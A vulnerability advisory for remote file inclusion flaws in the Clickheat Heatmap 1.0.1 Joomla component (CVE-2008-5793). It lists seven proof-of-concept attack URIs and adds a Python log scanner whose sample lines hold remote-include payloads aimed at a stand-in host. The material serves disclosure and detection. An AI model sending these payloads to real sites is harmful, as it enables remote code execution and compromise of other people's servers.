CVE-2008-5793 - Code Injection vulnerability in Recly Clickheat Heatmap 1.0.1

Publication

2008-12-31

Last modification

2017-09-29

Summary

Multiple PHP remote file inclusion vulnerabilities in the Clickheat - Heatmap stats (com_clickheat) component 1.0.1 for Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[mosConfig_absolute_path] parameter to (a) install.clickheat.php, (b) Cache.php and (c) Clickheat_Heatmap.php in Recly/Clickheat/, and (d) Recly/common/GlobalVariables.php; and the (2) mosConfig_absolute_path parameter to (e) _main.php and (f) main.php in includes/heatmap, and (g) includes/overview/main.php.

Description

Clickheat is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. Clickheat 1.0.1 is vulnerable; other versions may also be affected.

Solution

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: info@vumetric.com.

Exploit

An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available:

  • http://www.example.com/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
  • http://www.example.com/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
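A defender's check for the requests listed above, as an added example that is not part of the advisory: it scans combined-format access-log lines for the seven scripts and two parameter names the summary lists. The log lines, `classify` and its verdict labels are constructed for illustration; values sent in POST bodies or cookies do not appear in access logs and are not covered.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Component directory and the seven scripts named in the advisory.
COMPONENT = "/administrator/components/com_clickheat/"
SCRIPTS = {
    "install.clickheat.php",
    "Recly/Clickheat/Cache.php",
    "Recly/Clickheat/Clickheat_Heatmap.php",
    "Recly/common/GlobalVariables.php",
    "includes/heatmap/_main.php",
    "includes/heatmap/main.php",
    "includes/overview/main.php",
}
# The two parameter spellings named in the advisory.
PARAMS = {"mosConfig_absolute_path", "GLOBALS[mosConfig_absolute_path]"}
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')       # combined-log request field
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://... or //host/...

def classify(line):
    """Return 'remote-include', 'param-override' or None for one log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    path = unquote(target.path)
    start = path.find(COMPONENT)
    if start < 0 or path[start + len(COMPONENT):] not in SCRIPTS:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5B/%5D and %3A%2F%2F are covered.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name in PARAMS:
            if REMOTE.match(value):
                return "remote-include"
            verdict = "param-override"  # parameter supplied, but with a local value
    return verdict

# Constructed sample lines (documentation addresses and hosts, not real traffic).
PREFIX = '192.0.2.10 - - [01/Jan/2009:10:00:00 +0000] "GET /joomla' + COMPONENT
SAMPLE = [
    PREFIX + 'install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://host.example/x.txt HTTP/1.1" 200 512',
    PREFIX + 'Recly/Clickheat/Cache.php?GLOBALS%5BmosConfig_absolute_path%5D=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 0',
    PREFIX + 'includes/overview/main.php?mosConfig_absolute_path=/var/www HTTP/1.1" 200 90',
    PREFIX + 'includes/heatmap/main.php HTTP/1.1" 200 1834',
    '192.0.2.10 - - [01/Jan/2009:10:00:05 +0000] "GET /index.php?mosConfig_absolute_path=http://host.example/x HTTP/1.1" 200 77',
]

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE, 1):
        print(n, classify(line))
```

A `param-override` verdict still deserves review, since none of these scripts should receive that parameter from a client at all.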

Classification

CWE-94 - Code Injection

Risk level (CVSS AV:N/AC:M/Au:N/C:P/I:P/A:P)

Medium

6.8

Access Vector

  • Network
  • Adjacent Network
  • Local

Access Complexity

  • Low
  • Medium
  • High

Authentication

  • None
  • Single
  • Multiple

Confidentiality Impact

  • Complete
  • Partial
  • None

Integrity Impact

  • Complete
  • Partial
  • None

Affected Products

Vendor  Product            Versions
Recly   Clickheat Heatmap  1.0.1